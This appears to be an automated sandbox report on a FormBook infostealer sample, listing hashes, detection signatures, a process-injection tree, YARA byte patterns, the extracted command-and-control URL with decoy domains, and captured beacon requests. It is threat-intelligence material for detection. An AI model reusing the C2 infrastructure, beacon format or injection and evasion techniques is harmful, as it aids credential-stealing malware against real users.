Analysis Report 1cec9342_by_Libranalysis

Overview

General Information

Sample Name: 1cec9342_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 412599
MD5: 1cec9342ac2c1f91201df672382672f2
SHA1: 968ab56e042035a593279775308298cfdcdc0af7
SHA256: a1783d0a9f787d819b960b55c8ebfb227459bcb7daab55996720e8279751736f
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • 1cec9342_by_Libranalysis.exe (PID: 6800 cmdline: 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: 1CEC9342AC2C1F91201DF672382672F2)
    • 1cec9342_by_Libranalysis.exe (PID: 6840 cmdline: 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: 1CEC9342AC2C1F91201DF672382672F2)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 5876 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6164 cmdline: /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll, Metadefender: Detection: 26%
          Source: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll, ReversingLabs: Detection: 58%
          Multi AV Scanner detection for submitted file
          Source: 1cec9342_by_Libranalysis.exe, Virustotal: Detection: 54%
          Source: 1cec9342_by_Libranalysis.exe, Metadefender: Detection: 20%
          Source: 1cec9342_by_Libranalysis.exe, ReversingLabs: Detection: 82%
          Yara detected FormBook
          Source: Yara match, File source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: 1cec9342_by_Libranalysis.exe, Joe Sandbox ML: detected
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1cec9342_by_Libranalysis.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1cec9342_by_Libranalysis.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645751865.000000001EC00000.00000004.00000001.sdmp, 1cec9342_by_Libranalysis.exe, 00000001.00000002.693732282.0000000000B0F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 1cec9342_by_Libranalysis.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 0_2_004027A1 FindFirstFileA, 0_2_004027A1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 4x nop then pop ebx, 1_2_00406A95
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 4x nop then pop ebx, 1_1_00406A95
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 4x nop then pop ebx, 7_2_01036A95

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.nobleandmarble.com/or4i/
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG HTTP/1.1Host: www.healshameyoga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.rogersbeefarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi HTTP/1.1Host: www.nowhealthdays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.ikeberto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx HTTP/1.1Host: www.directflence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.mmgenius.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ HTTP/1.1Host: www.rainboxs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.nobleandmarble.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.safegrinder.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ HTTP/1.1Host: www.tecquestrian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.booweats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z HTTP/1.1Host: www.cuntrera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR HTTP/1.1Host: www.changethecompany.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 3.16.197.4
          Source: Joe Sandbox View, IP Address: 23.227.38.74
          Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
          Source: Joe Sandbox View, ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: unknown, DNS traffic detected: queries for: www.healshameyoga.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; date: Wed, 12 May 2021 18:03:26 GMT; server: Apache; accept-ranges: bytes; transfer-encoding: chunked; content-type: text/html; connection: close
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040535C

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004181BA NtCreateFile,1_2_004181BA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041826C NtReadFile,1_2_0041826C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004182EA NtClose,1_2_004182EA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A598F0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A59860
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59840 NtDelayExecution,LdrInitializeThunk,1_2_00A59840
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A599A0 NtCreateSection,LdrInitializeThunk,1_2_00A599A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A59910
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A20 NtResumeThread,LdrInitializeThunk,1_2_00A59A20
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A59A00
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A50 NtCreateFile,LdrInitializeThunk,1_2_00A59A50
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A595D0 NtClose,LdrInitializeThunk,1_2_00A595D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59540 NtReadFile,LdrInitializeThunk,1_2_00A59540
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A596E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A59660
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A597A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A59780
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59FE0 NtCreateMutant,LdrInitializeThunk,1_2_00A59FE0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A59710
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A598A0 NtWriteVirtualMemory,1_2_00A598A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59820 NtEnumerateKey,1_2_00A59820
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5B040 NtSuspendThread,1_2_00A5B040
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A599D0 NtCreateProcessEx,1_2_00A599D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59950 NtQueueApcThread,1_2_00A59950
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A80 NtOpenDirectoryObject,1_2_00A59A80
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A10 NtQuerySection,1_2_00A59A10
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5A3B0 NtGetContextThread,1_2_00A5A3B0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59B00 NtSetValueKey,1_2_00A59B00
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A595F0 NtQueryInformationFile,1_2_00A595F0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59520 NtWaitForSingleObject,1_2_00A59520
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5AD30 NtSetContextThread,1_2_00A5AD30
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59560 NtWriteFile,1_2_00A59560
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A596D0 NtCreateKey,1_2_00A596D0
